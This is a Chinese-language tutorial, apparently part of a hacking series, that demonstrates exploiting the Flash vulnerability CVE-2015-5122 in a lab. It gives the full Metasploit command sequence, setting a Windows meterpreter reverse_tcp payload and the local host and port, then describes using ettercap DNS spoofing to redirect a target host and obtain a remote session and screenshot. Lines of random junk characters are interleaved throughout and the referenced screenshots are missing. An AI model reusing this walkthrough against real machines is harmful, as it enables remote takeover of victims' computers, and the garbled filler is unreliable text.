; k+ y# l( k2 I6 a! q8 E* `
二、cve2015-5122漏洞实例演示虚拟机 7 m& g3 l0 Y8 @% V/ R# D/ q( l1 B8 w
q% V# i$ u/ D! ~4 ]0 O
$ r, P0 _- Z# V6 z* p0 Y 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 3 K, h; V1 ^+ C) O; ]
2 L/ H/ k* G0 Y8 _
5 n: L, _+ q3 t4 I- U7 Y
search cve-2015-5122如图:
+ o% s: s; A9 T5 R' @ ; i& x3 o6 O. O8 c( i( f' x. Q* m
: f6 [; ^4 M7 B5 Y; W4 T 2 j2 }9 e) L" T
. |. ?6 T! c4 t# v b% b
: F7 Q8 @% q' |; l! u# {: O 下面我们敲如下命令: 2 Z" |! j0 |) m( ~ [( T
# \ F6 R# b0 N& {, X6 }! Z1 F
* t* n& q: `" U% R/ s+ L/ g7 h
use exploit/multi/browser/adobe_flash_opaque_background_uaf ! F" Q1 B. L$ P
# q, _; K! t+ U$ P; M
4 M0 k. i# B; z4 t5 l" F9 H
set PAYLOAD windows/meterpreter/reverse_tcp
" |7 c; f& R5 b4 f2 q
% h- r& a! l8 h( D8 |' H4 ~/ R: V8 @1 Q& k2 Q( n* p% `
set LHOST 192.168.0.109 % i5 x- c" c' N6 m" |6 g: W
3 e0 x9 l+ x; d) i5 e
) w8 e. a, N1 e% |( H! V set URIPATH / /*根目录*/ * g4 p( O& ^; o6 A
. u! N" c& o$ `! |; h
, X# z4 Q m: F) Z7 ?
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
! p6 S* f0 [8 F$ T0 f4 G" `) U
6 F( o0 R+ v( @1 l9 U V& s% B, i6 g5 x7 j1 f% Z2 S7 O
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
. @' D5 D- a4 W/ Q & Y2 d E# J* }5 `0 T/ D; v
$ ]3 \6 e/ D8 C8 j
然后show options如图: " J" T7 M: \5 E4 B" K3 a! D' o" t, p
v9 e1 R$ V' R7 @: r5 c' W8 o) G% x2 ]" W% _7 J8 i; E+ u
6 k0 s( v9 c; ~% T: A3 j0 ~3 O
2 P) P0 e2 n: e; ]# K: w. @* O6 B+ V, v8 g# M; |
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
5 {- r8 g" g1 B0 s9 X " [. W0 e8 K8 V) J3 M6 u% e5 T
y( |( ]: `. k% _* l: s
4 V) Y! H. q9 A+ s/ S' N. o
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
2 {8 e) f+ h9 q+ t% }6 Q 4 @( h, R2 g; d% p8 `' s# O
) R) k4 n c# @- j
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
{% \& \. S9 n8 r) E/ g ; Q. ?+ v) A, {/ a) n7 N C
* f% K7 D; ^) `! K8 {& l. U. \- Y
/ G2 L A1 }' t" J4 r. V; ~
4 s# ? q5 G# X: X1 x; J3 o- i
# P& \+ U% o8 V6 u* T 成功了,这时候我们断开ettercap,如图:
# M5 E8 g( D, [5 r" b3 g
; {2 F5 C1 m7 k, f( r$ X; _6 c/ z, u& Z" o) `4 d3 m1 L& a8 s
) q! A: R# u% P/ P
7 x/ C: \3 f d+ F/ p0 q/ `
$ a* s3 q* K9 M% N% C7 y Screenshot如图: 3 H+ N, ^3 w" v2 U5 k! ?* m1 Z5 }
; D3 }8 f4 o% U! Q2 g& e6 u- X
9 B! T$ j) r% a' q4 k 4 M( U) R3 O8 N8 i) d' ?$ E
( J \: ?$ m5 v& o a7 l$ s
8 {0 I" P& o/ _4 G" K4 u: I # d( n+ e4 `/ B [6 W5 `* R) _2 M
|